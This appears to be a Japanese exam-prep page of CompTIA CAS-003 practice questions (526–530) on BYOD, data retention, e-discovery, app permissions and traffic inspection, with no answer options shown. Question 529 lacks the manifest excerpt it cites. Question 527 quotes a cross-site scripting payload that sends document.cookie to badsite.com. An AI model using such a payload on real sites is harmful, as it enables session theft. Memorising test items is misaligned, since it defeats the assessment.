CAS-003 試験問題 526

BYODに関するセキュリティ上の最大の懸念事項は次のうちどれですか?
  • CAS-003 試験問題 527

    セキュリティ管理者は、サーバーのセキュリティログに次の行があることに気づきます。
    <input name = 'credentials' type = 'TEXT' value = '"+ request.getParameter('> <script> document.location = '
    http://badsite.com/?q='document.cookie </ script> ')+ "';
    管理者は、サーバー上で実行されているアプリケーションを修正するのに開発者が多くの時間を要することを懸念しています。この特定の攻撃を防ぐために、セキュリティ管理者は次のうちどれを実装する必要がありますか?
  • CAS-003 試験問題 528

    ある企業は、法務部門の要求とSAN管理者の推奨に応じて、データ保持ポリシーとストレージ割り当てを実装しています。
    保持ポリシーでは、90日より古いすべての電子メールデータを削除する必要があると規定されています。
    技術的な管理が行われていないため、ユーザーは500Mbのネットワークストレージと200Mbの電子メールストレージのストレージクォータを維持するように指示されています。
    反対の法務評議会から電子情報開示要求が提示された後、セキュリティ管理者は、訴訟のユーザーが2年間にわたって1Tbのファイルと300Mbの電子メールを持っていることを発見しました。
    セキュリティ管理者が反対の評議会に提供する必要があるのは次のうちどれですか?
  • CAS-003 試験問題 529

    組織は、BYOD展開スキーム内で公式に使用するためにサードパーティのモバイルアプリケーションに大きく依存しています。承認されたテキストベースのチャットクライアントアプリケーションAndroidManifest.xmlからの抜粋は次のとおりです。

    通常のデバイス操作への影響を最小限に抑えながら、アプリケーションのアクセス許可を制限するのは次のうちどれですか?
  • CAS-003 試験問題 530

    法務部門は、企業のクラウドベースのワードプロセッシングおよび電子メールシステムとの間のすべてのトラフィックをログに記録することを要求しています。この要件を満たすために、最高情報セキュリティ責任者(CISO)は、安全なトラフィックの検査を実行する次世代ファイアウォールを実装し、ログに記録されるすべてのトラフィックにクラウドベースのログ集約ソリューションを使用することを決定しました。
    このシナリオでユーザーのプライバシーに長期的なリスクをもたらすのは次のうちどれですか?